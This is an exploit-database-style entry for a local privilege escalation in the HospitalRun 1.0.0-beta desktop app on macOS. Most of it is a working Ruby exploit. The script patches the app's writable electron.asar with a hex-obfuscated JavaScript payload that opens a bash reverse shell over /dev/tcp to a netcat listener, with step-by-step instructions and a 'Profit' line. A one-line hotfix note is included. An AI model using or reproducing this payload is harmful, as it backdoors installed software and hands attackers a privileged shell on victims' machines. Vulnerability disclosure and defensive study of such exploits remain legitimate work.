HospitalRun 1.0.0-beta macOS Local Root

`# Exploit Title: HospitalRun 1.0.0-beta - Local Root Exploit for macOS  
# Written by Jean Pereira <[email protected]>  
  
# Date: 2023/03/04  
# Vendor Homepage: https://hospitalrun.io  
# Software Link: https://github.com/HospitalRun/hospitalrun-frontend/releases/download/1.0.0-beta/HospitalRun.dmg  
# Version: 1.0.0-beta  
# Tested on: macOS Ventura 13.2.1 (22D68)  
  
# Impact: Command Execution, Privilege Escalation  
  
# Instructions:  
# Run local TCP listener with (e.g. nc -l 2222)  
# Run exploit  
# Wait for HospitalRun to be executed  
# Profit (privileged rights e.g. root are gained)  
  
# Hotfix: Remove write permissions from electron.asar to patch this vulnerability  
  
# Exploit:  
  
buffer = "\x63\x6F\x6E\x73\x74\x20\x72\x65\x6E" +  
"\x64\x65\x72\x50\x72\x6F\x63\x65\x73" +  
"\x73\x50\x72\x65\x66\x65\x72\x65\x6E" +  
"\x63\x65\x73\x20\x3D\x20\x70\x72\x6F" +  
"\x63\x65\x73\x73\x2E\x61\x74\x6F\x6D" +  
"\x42\x69\x6E\x64\x69\x6E\x67\x28\x27" +  
"\x72\x65\x6E\x64\x65\x72\x5F\x70\x72" +  
"\x6F\x63\x65\x73\x73\x5F\x70\x72\x65" +  
"\x66\x65\x72\x65\x6E\x63\x65\x73\x27" +  
"\x29\x2E\x66\x6F\x72\x41\x6C\x6C\x57" +  
"\x65\x62\x43\x6F\x6E\x74\x65\x6E\x74" +  
"\x73\x28\x29"  
  
payload = "\x72\x65\x71\x75\x69\x72\x65\x28\x22" +  
"\x63\x68\x69\x6C\x64\x5F\x70\x72\x6F" +  
"\x63\x65\x73\x73\x22\x29\x2E\x65\x78" +  
"\x65\x63\x53\x79\x6E\x63\x28\x22\x2F" +  
"\x62\x69\x6E\x2F\x62\x61\x73\x68\x20" +  
"\x2D\x63\x20\x27\x65\x78\x65\x63\x20" +  
"\x62\x61\x73\x68\x20\x2D\x69\x20\x3E" +  
"\x2F\x64\x65\x76\x2F\x74\x63\x70\x2F" +  
"\x30\x2E\x30\x2E\x30\x2E\x30\x2F\x32" +  
"\x32\x32\x32\x20\x30\x3E\x26\x31\x27" +  
"\x22\x29"  
  
nopsled = "\x2F\x2A\x2A\x2A\x2A" +  
"\x2A\x2A\x2A\x2A\x2F"  
  
File.open("/Applications/HospitalRun.app/Contents/Resources/electron.asar", "rb+") do |file|  
electron = file.read  
electron.gsub!(buffer, payload + nopsled)  
file.pos = 0  
file.write(electron)  
end  
  
  
`